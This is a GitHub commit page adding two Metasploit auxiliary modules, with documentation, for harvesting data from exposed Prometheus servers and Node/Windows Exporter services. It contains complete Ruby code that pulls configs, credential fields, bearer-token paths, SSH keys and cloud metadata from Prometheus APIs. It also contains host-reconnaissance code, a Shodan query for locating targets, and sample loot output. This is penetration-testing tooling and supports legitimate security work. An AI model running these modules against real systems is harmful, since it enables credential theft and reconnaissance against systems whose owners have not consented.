forked from rapid7/metasploit-framework
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Land rapid7#18290, Prometheus API & Prometheus Node Exporter Interrog…
…ator Merge branch 'land-18290' into upstream-master
Showing
6 changed files
with
2,522 additions
and
0 deletions.
There are no files selected for viewing
61 changes: 61 additions & 0 deletions
61
documentation/modules/auxiliary/gather/prometheus_api_gather.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,61 @@ | ||
## Vulnerable Application | ||
|
||
This module utilizes Prometheus' API calls to gather information about | ||
the server's configuration, and targets. Fields which may contain | ||
credentials, or credential file names are then pulled out and printed. | ||
|
||
Targets may have a wealth of information, this module will print the following | ||
values when found: | ||
`__meta_gce_metadata_ssh_keys`, `__meta_gce_metadata_startup_script`, | ||
`__meta_gce_metadata_kube_env`, `kubernetes_sd_configs`, | ||
`_meta_kubernetes_pod_annotation_kubectl_kubernetes_io_last_applied_configuration`, | ||
`__meta_ec2_tag_CreatedBy`, `__meta_ec2_tag_OwnedBy` | ||
|
||
Shodan search: `"http.favicon.hash:-1399433489"` | ||
|
||
A docker image is [available](https://hub.docker.com/r/prom/prometheus) however | ||
this basic configuration has almost no interest data. Configuring it can be tricky | ||
as it may not start w/o being able to contact the contacted services. | ||
|
||
## Verification Steps | ||
|
||
1. Install the application or find one on the Internet | ||
1. Start msfconsole | ||
1. Do: `use auxiliary/gather/prometheus_api_gather` | ||
1. Do: `set rhosts [ip]` | ||
1. Do: `run` | ||
1. You should get any valuable information | ||
|
||
## Options | ||
|
||
## Scenarios | ||
|
||
### Prometheus 2.39.1 | ||
|
||
``` | ||
msf6 auxiliary(gather/prometheus_api_gather) > set rhosts 11.111.11.111 | ||
rhosts => 11.111.11.111 | ||
msf6 auxiliary(gather/prometheus_api_gather) > set rport 80 | ||
rport => 80 | ||
msf6 auxiliary(gather/prometheus_api_gather) > run | ||
[*] Running module against 11.111.11.111 | ||
[*] 11.111.11.111:80 - Checking build info | ||
[+] Prometheus found, version: 2.39.1 | ||
[*] 11.111.11.111:80 - Checking status config | ||
[+] YAML config saved to /root/.msf4/loot/20230815174315_default_11.111.11.111_PrometheusYAML_982929.yaml | ||
[+] Credentials | ||
=========== | ||
Name Config Host Port Public/Username Private/Password/Token Notes | ||
---- ------ ---- ---- --------------- ---------------------- ----- | ||
kubernetes-apiservers authorization Bearer /var/run/secrets/kubernetes.io/serviceaccount/token | ||
kubernetes-nodes authorization Bearer /var/run/secrets/kubernetes.io/serviceaccount/token | ||
kubernetes-nodes-cadvisor authorization Bearer /var/run/secrets/kubernetes.io/serviceaccount/token | ||
[*] 11.111.11.111:80 - Checking targets | ||
[+] JSON targets saved to /root/.msf4/loot/20230815174315_default_11.111.11.111_PrometheusJSON_145604.json | ||
[*] 11.111.11.111:80 - Checking status flags | ||
[+] Config file: /etc/config/prometheus.yml | ||
[*] Auxiliary module execution completed | ||
``` |
132 changes: 132 additions & 0 deletions
132
documentation/modules/auxiliary/gather/prometheus_node_exporter_gather.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,132 @@ | ||
## Vulnerable Application | ||
|
||
This modules connects to a Prometheus Node Exporter or Windows Exporter service | ||
and gathers information about the host. | ||
|
||
Tested against Docker image 1.6.1, Linux 1.6.1, and Windows 0.23.1 | ||
|
||
### Install | ||
|
||
#### Docker | ||
|
||
`docker run -d --net="host" --pid="host" -v "/:/host:ro,rslave" quay.io/prometheus/node-exporter:latest --path.rootfs=/host` | ||
|
||
#### Linux | ||
|
||
[Instructions](https://prometheus.io/docs/guides/node-exporter/#installing-and-running-the-node-exporter) | ||
|
||
``` | ||
wget https://github.com/prometheus/node_exporter/releases/download/v1.6.1/node_exporter-1.6.1.linux-amd64.tar.gz | ||
tar xvfz node_exporter-1.6.1.linux-amd64.tar.gz | ||
cd node_exporter-*.*-amd64 | ||
./node_exporter --collector.buddyinfo --collector.cgroups --collector.drm --collector.drbd --collector.ethtool --collector.interrupts --collector.ksmd --collector.lnstat --collector.logind --collector.meminfo_numa --collector.mountstats --collector.network_route --collector.perf --collector.processes --collector.qdisc --collector.slabinfo --collector.softirqs --collector.sysctl --collector.systemd --collector.tcpstat --collector.wifi --collector.zoneinfo | ||
``` | ||
|
||
#### Windows | ||
|
||
Download the latest release from [github](https://github.com/prometheus-community/windows_exporter/releases) | ||
|
||
Run it with the following command: | ||
``` | ||
.\windows_exporter-0.23.1-amd64.exe --collectors.enabled ad,adcs,adfs,cache,cpu,cpu_info,cs,container,dfsr,dhcp,dns,exchange,fsrmquota,hyperv,iis,logical_disk,logon,memory,mscluster_cluster,mscluster_network,mscluster_node,mscluster_resource,mscluster_resourcegroup,msmq,mssql,netframework_clrexceptions,netframework_clrinterop,netframework_clrjit,netframework_clrloading,netframework_clrlocksandthreads,netframework_clrmemory,netframework_clrremoting,netframework_clrsecurity,net,os,process,remote_fx,scheduled_task,service,smtp,system,tcp,teradici_pcoip,time,thermalzone,terminal_services,textfile,vmware_blast,vmware | ||
``` | ||
|
||
## Verification Steps | ||
|
||
1. Install the application | ||
1. Start msfconsole | ||
1. Do: `use auxiliary/gather/prometheus_node_exporter_gather` | ||
1. Do: `set rhosts [ip]` | ||
1. Do: `run` | ||
1. You should get information back about the host. | ||
|
||
## Options | ||
|
||
## Scenarios | ||
|
||
### Docker 1.6.1 | ||
|
||
``` | ||
msf6 > use auxiliary/gather/prometheus_node_exporter_gather | ||
msf6 auxiliary(gather/prometheus_node_exporter_gather) > set rhosts 127.0.0.1 | ||
rhosts => 127.0.0.1 | ||
msf6 auxiliary(gather/prometheus_node_exporter_gather) > set verbose true | ||
verbose => true | ||
msf6 auxiliary(gather/prometheus_node_exporter_gather) > run | ||
[*] Running module against 127.0.0.1 | ||
[*] 127.0.0.1:9100 - Checking | ||
[+] 127.0.0.1:9100 - Prometheus Node Exporter version: 1.6.1 | ||
[+] Go Version: go1.20.6 | ||
[+] SELinux enabled: 0 | ||
[+] Timezone: UTC | ||
[+] BIOS Information | ||
================ | ||
Field Value | ||
----- ----- | ||
Asset Tag | ||
Board Name 000000 | ||
Board Vendor Sanitized | ||
Board Version 111 | ||
Chassis Asset Tag | ||
Chassis Vendor Sanitized | ||
Date 04/17/2023 | ||
Product Family Sanitized | ||
Product Name Sanitized | ||
System Vendor Sanitized | ||
Vendor Sanitized | ||
Version 1.0.0 | ||
[+] OS Information | ||
============== | ||
Field Value | ||
----- ----- | ||
Family kali | ||
Name Kali GNU/Linux | ||
Pretty Name Kali GNU/Linux Rolling | ||
Version 2023.3 | ||
Version Codename kali-rolling | ||
Version ID 2023.3 | ||
[+] Network Interfaces | ||
================== | ||
Device MAC Broadcast State | ||
------ --- --------- ----- | ||
br-4b55fa64cd13 de:ad:be:ef:de:ad de:ad:be:ef:de:ad down | ||
br-65f1f7a9ff61 de:ad:be:ef:de:ad de:ad:be:ef:de:ad down | ||
docker0 de:ad:be:ef:de:ad de:ad:be:ef:de:ad up | ||
eth0 de:ad:be:ef:de:ad de:ad:be:ef:de:ad down | ||
lo de:ad:be:ef:de:ad de:ad:be:ef:de:ad unknown | ||
vethe418d5c de:ad:be:ef:de:ad de:ad:be:ef:de:ad up | ||
wlan0 de:ad:be:ef:de:ad de:ad:be:ef:de:ad up | ||
[+] File Systems | ||
============ | ||
Device Mount Point FS Type | ||
------ ----------- ------- | ||
/dev/mapper/map--new--vg-root / ext4 | ||
/dev/nvme0n1p1 /boot/efi vfat | ||
/dev/nvme1n1p2 /boot ext2 | ||
tmpfs /run tmpfs | ||
tmpfs /run/lock tmpfs | ||
tmpfs /run/user/1000 tmpfs | ||
tmpfs /run/user/125 tmpfs | ||
[+] uname Information | ||
================= | ||
Field Value | ||
----- ----- | ||
Arch x86_64 | ||
Domain Name (none) | ||
Node Name ragekali-new | ||
OS Type Linux | ||
Release 6.3.0-kali1-amd64 | ||
Version #1 SMP PREEMPT_DYNAMIC Debian 6.3.7-1kali1 (2023-06-29) | ||
[*] Auxiliary module execution completed | ||
``` |
Large diffs are not rendered by default.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,151 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Auxiliary | ||
include Msf::Exploit::Remote::HttpClient | ||
include Msf::Auxiliary::Prometheus | ||
|
||
def initialize(info = {}) | ||
super( | ||
update_info( | ||
info, | ||
'Name' => 'Prometheus API Information Gather', | ||
'Description' => %q{ | ||
This module utilizes Prometheus' API calls to gather information about | ||
the server's configuration, and targets. Fields which may contain | ||
credentials, or credential file names are then pulled out and printed. | ||
Targets may have a wealth of information, this module will print the following | ||
values when found: | ||
__meta_gce_metadata_ssh_keys, __meta_gce_metadata_startup_script, | ||
__meta_gce_metadata_kube_env, kubernetes_sd_configs, | ||
_meta_kubernetes_pod_annotation_kubectl_kubernetes_io_last_applied_configuration, | ||
__meta_ec2_tag_CreatedBy, __meta_ec2_tag_OwnedBy | ||
Shodan search: "http.favicon.hash:-1399433489" | ||
}, | ||
'License' => MSF_LICENSE, | ||
'Author' => [ | ||
'h00die' | ||
], | ||
'References' => [ | ||
['URL', 'https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/'] | ||
], | ||
|
||
'Targets' => [ | ||
[ 'Automatic Target', {}] | ||
], | ||
'DisclosureDate' => '2016-07-01', # Prometheus 1.0 release date, who knows.... | ||
'DefaultTarget' => 0, | ||
'Notes' => { | ||
'Stability' => [CRASH_SAFE], | ||
'Reliability' => [], | ||
'SideEffects' => [IOC_IN_LOGS] | ||
} | ||
) | ||
) | ||
register_options( | ||
[ | ||
Opt::RPORT(9090), | ||
OptString.new('TARGETURI', [ true, 'The URI of Prometheus', '/']) | ||
] | ||
) | ||
end | ||
|
||
def run | ||
vprint_status("#{peer} - Checking build info") | ||
res = send_request_cgi( | ||
'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'status', 'buildinfo'), | ||
'method' => 'GET' | ||
) | ||
|
||
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil? | ||
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response from server (response code #{res.code})") unless res.code == 200 | ||
json = res.get_json_document | ||
version = json.dig('data', 'version') | ||
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response from server (unable to find version number)") unless version | ||
print_good("Prometheus found, version: #{version}") | ||
|
||
vprint_status("#{peer} - Checking status config") | ||
res = send_request_cgi( | ||
'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'status', 'config'), | ||
'method' => 'GET' | ||
) | ||
|
||
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil? | ||
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response from server (response code #{res.code})") unless res.code == 200 | ||
json = res.get_json_document | ||
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to parse JSON document") unless json | ||
yaml = json.dig('data', 'yaml') | ||
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response from server (unable to find yaml)") unless yaml | ||
begin | ||
yamlconf = YAML.safe_load(yaml) | ||
loot_path = store_loot('Prometheus YAML Config', 'application/yaml', datastore['RHOST'], yaml, 'config.yaml') | ||
print_good("YAML config saved to #{loot_path}") | ||
prometheus_config_eater(yamlconf) | ||
rescue Psych::DisallowedClass | ||
# [-] Auxiliary failed: Psych::DisallowedClass Tried to load unspecified class: Symbol | ||
print_bad('Unable to load YAML') | ||
end | ||
|
||
vprint_status("#{peer} - Checking targets") | ||
res = send_request_cgi( | ||
'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'targets'), | ||
'method' => 'GET' | ||
) | ||
table_targets = Rex::Text::Table.new( | ||
'Header' => 'Target Data', | ||
'Indent' => 2, | ||
'Columns' => | ||
[ | ||
'Field', | ||
'Data' | ||
] | ||
) | ||
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil? | ||
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response from server (response code #{res.code})") unless res.code == 200 | ||
|
||
json = res.get_json_document | ||
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to parse JSON document") unless json | ||
loot_path = store_loot('Prometheus JSON targets', 'application/json', datastore['RHOST'], json.to_json, 'targets.json') | ||
print_good("JSON targets saved to #{loot_path}") | ||
json.dig('data', 'activeTargets').each do |target| | ||
[ | ||
'__meta_gce_metadata_ssh_keys', '__meta_gce_metadata_startup_script', '__meta_gce_metadata_kube_env', 'kubernetes_sd_configs', | ||
'_meta_kubernetes_pod_annotation_kubectl_kubernetes_io_last_applied_configuration', '__meta_ec2_tag_CreatedBy', '__meta_ec2_tag_OwnedBy' | ||
].each do |key| | ||
if target[key] | ||
table_targets << [ | ||
key, | ||
target[key] | ||
] | ||
end | ||
|
||
next unless target.dig('discoveredLabels', key) | ||
|
||
table_targets << [ | ||
key, | ||
target.dig('discoveredLabels', key) | ||
] | ||
end | ||
end | ||
|
||
print_good(table_targets.to_s) if !table_targets.rows.empty? | ||
|
||
vprint_status("#{peer} - Checking status flags") | ||
res = send_request_cgi( | ||
'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'status', 'flags'), | ||
'method' => 'GET' | ||
) | ||
|
||
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil? | ||
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response from server (response code #{res.code})") unless res.code == 200 | ||
json = res.get_json_document | ||
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to parse JSON document") unless json | ||
print_good("Config file: #{json.dig('data', 'config.file')}") if json.dig('data', 'config.file') | ||
rescue ::Rex::ConnectionError | ||
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") | ||
end | ||
end |
315 changes: 315 additions & 0 deletions
315
modules/auxiliary/gather/prometheus_node_exporter_gather.rb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,315 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Auxiliary | ||
include Msf::Exploit::Remote::HttpClient | ||
include Msf::Auxiliary::Prometheus | ||
|
||
def initialize(info = {}) | ||
super( | ||
update_info( | ||
info, | ||
'Name' => 'Prometheus Node Exporter And Windows Exporter Information Gather', | ||
'Description' => %q{ | ||
This modules connects to a Prometheus Node Exporter or Windows Exporter service | ||
and gathers information about the host. | ||
Tested against Docker image 1.6.1, Linux 1.6.1, and Windows 0.23.1 | ||
}, | ||
'License' => MSF_LICENSE, | ||
'Author' => [ | ||
'h00die' | ||
], | ||
'References' => [ | ||
['URL', 'https://github.com/prometheus/node_exporter'], | ||
['URL', 'https://sysdig.com/blog/exposed-prometheus-exploit-kubernetes-kubeconeu/'] | ||
], | ||
|
||
'Targets' => [ | ||
[ 'Automatic Target', {}] | ||
], | ||
'DisclosureDate' => '2013-04-18', # node exporter first commit on github | ||
'DefaultTarget' => 0, | ||
'Notes' => { | ||
'Stability' => [CRASH_SAFE], | ||
'Reliability' => [], | ||
'SideEffects' => [IOC_IN_LOGS] | ||
} | ||
) | ||
) | ||
register_options( | ||
[ | ||
Opt::RPORT(9100), # windows 9182 | ||
OptString.new('TARGETURI', [ true, 'The URI of the Prometheus Node Exporter', '/']) | ||
] | ||
) | ||
end | ||
|
||
def run | ||
vprint_status("#{peer} - Checking ") | ||
# since we will check res to see if auth was a success, make sure to capture the return | ||
res = send_request_cgi( | ||
'uri' => normalize_uri(target_uri.path), | ||
'method' => 'GET' | ||
) | ||
|
||
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil? | ||
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response from server (response code #{res.code})") unless res.code == 200 | ||
fail_with(Failure::UnexpectedReply, "#{peer} - Prometheus Node Exporter not found") unless ( | ||
res.body.include?('<h2>Prometheus Node Exporter</h2>') || | ||
res.body.include?('<title>Node Exporter</title>') || # version 0.15.2 | ||
res.body.include?('<h2>Prometheus Exporter for Windows servers</h2>') | ||
) | ||
|
||
vprint_good("#{peer} - Prometheus Node Exporter version: #{Regexp.last_match(1)}") if res.body =~ /version=([\d.]+)/ | ||
|
||
res = send_request_cgi( | ||
'uri' => normalize_uri(target_uri.path, 'metrics'), | ||
'method' => 'GET' | ||
) | ||
|
||
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil? | ||
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response from server (response code #{res.code})") unless res.code == 200 | ||
|
||
results = process_results_page(res.body) | ||
|
||
if results.nil? || results == [] | ||
print_bad("#{peer} - No metric data found") | ||
return | ||
end | ||
|
||
table_network = Rex::Text::Table.new( | ||
'Header' => 'Network Interfaces', | ||
'Indent' => 2, | ||
'Columns' => | ||
[ | ||
'Device', | ||
'MAC', | ||
'Broadcast', | ||
'State', | ||
] | ||
) | ||
|
||
table_fs = Rex::Text::Table.new( | ||
'Header' => 'File Systems', | ||
'Indent' => 2, | ||
'Columns' => | ||
[ | ||
'Device', | ||
'Mount Point', | ||
'FS Type', | ||
] | ||
) | ||
|
||
table_bios = Rex::Text::Table.new( | ||
'Header' => 'BIOS Information', | ||
'Indent' => 2, | ||
'Columns' => | ||
[ | ||
'Field', | ||
'Value', | ||
] | ||
) | ||
|
||
table_os = Rex::Text::Table.new( | ||
'Header' => 'OS Information', | ||
'Indent' => 2, | ||
'Columns' => | ||
[ | ||
'Field', | ||
'Value', | ||
] | ||
) | ||
|
||
table_uname = Rex::Text::Table.new( | ||
'Header' => 'uname Information', | ||
'Indent' => 2, | ||
'Columns' => | ||
[ | ||
'Field', | ||
'Value', | ||
] | ||
) | ||
|
||
table_windows_domain = Rex::Text::Table.new( | ||
'Header' => 'Domain Information', | ||
'Indent' => 2, | ||
'Columns' => | ||
[ | ||
'Field', | ||
'Value', | ||
] | ||
) | ||
|
||
table_device_mapper = Rex::Text::Table.new( | ||
'Header' => 'Disk Device Mapper Information', | ||
'Indent' => 2, | ||
'Columns' => | ||
[ | ||
'Device', | ||
'Name', | ||
'Logical Volume Name', | ||
'UUID' | ||
] | ||
) | ||
|
||
table_network_route = Rex::Text::Table.new( | ||
'Header' => 'Network Route Information', | ||
'Indent' => 2, | ||
'Columns' => | ||
[ | ||
'Device', | ||
'IP', | ||
'Gateway', | ||
'Network' | ||
] | ||
) | ||
|
||
table_systemd = Rex::Text::Table.new( | ||
'Header' => 'Systemd Information', | ||
'Indent' => 2, | ||
'Columns' => | ||
[ | ||
'Service', | ||
'State', | ||
'Permission' | ||
] | ||
) | ||
|
||
table_windows_cpu = Rex::Text::Table.new( | ||
'Header' => 'CPU Information', | ||
'Indent' => 2, | ||
'Columns' => | ||
[ | ||
'Field', | ||
'Value', | ||
] | ||
) | ||
|
||
results.each do |result| | ||
if result['go_info'] | ||
print_good("Go Version: #{result.dig('go_info', 'labels', 'version')}") | ||
elsif result['node_selinux_enabled'] | ||
print_good("SELinux enabled: #{result.dig('node_selinux_enabled', 'value')}") | ||
elsif result['node_time_zone_offset_seconds'] | ||
print_good("Timezone: #{result.dig('node_time_zone_offset_seconds', 'labels', 'time_zone')}") | ||
elsif result['windows_os_timezone'] | ||
print_good("Timezone: #{result.dig('windows_os_timezone', 'labels', 'timezone')}") | ||
elsif result['node_dmi_info'] | ||
table_bios << ['Date', result.dig('node_dmi_info', 'labels', 'bios_date')] | ||
table_bios << ['Vendor', result.dig('node_dmi_info', 'labels', 'bios_vendor')] | ||
table_bios << ['Version', result.dig('node_dmi_info', 'labels', 'bios_version')] | ||
table_bios << ['Asset Tag', result.dig('node_dmi_info', 'labels', 'board_asset_tag')] | ||
table_bios << ['Board Vendor', result.dig('node_dmi_info', 'labels', 'board_vendor')] | ||
table_bios << ['Board Name', result.dig('node_dmi_info', 'labels', 'board_name')] | ||
table_bios << ['Board Version', result.dig('node_dmi_info', 'labels', 'board_version')] | ||
table_bios << ['Chassis Asset Tag', result.dig('node_dmi_info', 'labels', 'chassis_asset_tag')] | ||
table_bios << ['Chassis Vendor', result.dig('node_dmi_info', 'labels', 'chassis_vendor')] | ||
table_bios << ['Product Family', result.dig('node_dmi_info', 'labels', 'product_family')] | ||
table_bios << ['Product Name', result.dig('node_dmi_info', 'labels', 'product_name')] | ||
table_bios << ['System Vendor', result.dig('node_dmi_info', 'labels', 'system_vendor')] | ||
elsif result['node_filesystem_avail_bytes'] | ||
table_fs << [ | ||
result.dig('node_filesystem_avail_bytes', 'labels', 'device'), | ||
result.dig('node_filesystem_avail_bytes', 'labels', 'mountpoint'), | ||
result.dig('node_filesystem_avail_bytes', 'labels', 'fstype'), | ||
] | ||
elsif result['node_filesystem_avail'] # version 0.15.2 | ||
table_fs << [ | ||
result.dig('node_filesystem_avail', 'labels', 'device'), | ||
result.dig('node_filesystem_avail', 'labels', 'mountpoint'), | ||
result.dig('node_filesystem_avail', 'labels', 'fstype'), | ||
] | ||
elsif result['windows_logical_disk_size_bytes'] | ||
table_fs << [ | ||
'', | ||
result.dig('windows_logical_disk_size_bytes', 'labels', 'volume'), | ||
'', | ||
] | ||
elsif result['node_network_info'] | ||
table_network << [ | ||
result.dig('node_network_info', 'labels', 'device'), | ||
result.dig('node_network_info', 'labels', 'address'), | ||
result.dig('node_network_info', 'labels', 'broadcast'), | ||
result.dig('node_network_info', 'labels', 'operstate') | ||
] | ||
elsif result['node_os_info'] | ||
table_os << ['Family', result.dig('node_os_info', 'labels', 'id')] | ||
table_os << ['Name', result.dig('node_os_info', 'labels', 'name')] | ||
table_os << ['Version', result.dig('node_os_info', 'labels', 'version')] | ||
table_os << ['Version ID', result.dig('node_os_info', 'labels', 'version_id')] | ||
table_os << ['Version Codename', result.dig('node_os_info', 'labels', 'version_codename')] | ||
table_os << ['Pretty Name', result.dig('node_os_info', 'labels', 'pretty_name')] | ||
elsif result['windows_os_info'] | ||
table_os << ['Product', result.dig('windows_os_info', 'labels', 'product')] | ||
table_os << ['Version', result.dig('windows_os_info', 'labels', 'version')] | ||
table_os << ['Build Number', result.dig('windows_os_info', 'labels', 'build_number')] | ||
elsif result['node_uname_info'] | ||
table_uname << ['Domain Name', result.dig('node_uname_info', 'labels', 'domainname')] | ||
table_uname << ['Arch', result.dig('node_uname_info', 'labels', 'machine')] | ||
table_uname << ['Release', result.dig('node_uname_info', 'labels', 'release')] | ||
table_uname << ['OS Type', result.dig('node_uname_info', 'labels', 'sysname')] | ||
table_uname << ['Version', result.dig('node_uname_info', 'labels', 'version')] | ||
table_uname << ['Node Name', result.dig('node_uname_info', 'labels', 'nodename')] | ||
elsif result['windows_cs_hostname'] | ||
table_windows_domain << ['Domain Name', result.dig('windows_cs_hostname', 'labels', 'domain')] | ||
table_windows_domain << ['FQDN', result.dig('windows_cs_hostname', 'labels', 'fqdn')] | ||
table_windows_domain << ['Hostname', result.dig('windows_cs_hostname', 'labels', 'hostname')] | ||
elsif result['node_disk_device_mapper_info'] | ||
table_device_mapper << [ | ||
result.dig('node_disk_device_mapper_info', 'labels', 'device'), | ||
result.dig('node_disk_device_mapper_info', 'labels', 'name'), | ||
result.dig('node_disk_device_mapper_info', 'labels', 'lv_name'), | ||
result.dig('node_disk_device_mapper_info', 'labels', 'uuid'), | ||
] | ||
elsif result['node_network_route_info'] | ||
table_network_route << [ | ||
result.dig('node_network_route_info', 'labels', 'device'), | ||
result.dig('node_network_route_info', 'labels', 'src'), | ||
result.dig('node_network_route_info', 'labels', 'gw'), | ||
result.dig('node_network_route_info', 'labels', 'dest'), | ||
] | ||
elsif result['windows_net_bytes_sent_total'] | ||
table_network_route << [ | ||
result.dig('windows_net_bytes_sent_total', 'labels', 'nic'), | ||
'', | ||
'', | ||
'', | ||
] | ||
elsif result['node_systemd_unit_state'] | ||
# these come back in groups of 4-5 where the value is 0 if a state isn't enabled. | ||
# we only care about state 1 because thats what that service is at run time | ||
if result.dig('node_systemd_unit_state', 'value') == '1' | ||
table_systemd << [ | ||
result.dig('node_systemd_unit_state', 'labels', 'name'), | ||
result.dig('node_systemd_unit_state', 'labels', 'state'), | ||
'' | ||
] | ||
end | ||
elsif result['windows_service_info'] | ||
table_systemd << [ | ||
result.dig('windows_service_info', 'labels', 'display_name'), | ||
result.dig('windows_service_info', 'labels', 'process_id') == '0' ? 'inactive' : 'active', | ||
result.dig('windows_service_info', 'labels', 'run_as'), | ||
] | ||
elsif result['windows_cpu_info'] | ||
table_windows_cpu << ['ID', result.dig('windows_cpu_info', 'labels', 'device_id')] | ||
table_windows_cpu << ['Architecture', result.dig('windows_cpu_info', 'labels', 'architecture')] | ||
table_windows_cpu << ['Description', result.dig('windows_cpu_info', 'labels', 'description')] | ||
table_windows_cpu << ['Name', result.dig('windows_cpu_info', 'labels', 'name')] | ||
|
||
end | ||
end | ||
|
||
[ | ||
table_bios, table_os, table_network, table_windows_domain, table_fs, table_uname, table_windows_cpu, | ||
table_device_mapper, table_network_route, table_systemd, | ||
].each do |table| | ||
print_good(table.to_s) if !table.rows.empty? | ||
end | ||
rescue ::Rex::ConnectionError | ||
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") | ||
end | ||
end |
Large diffs are not rendered by default.
Oops, something went wrong.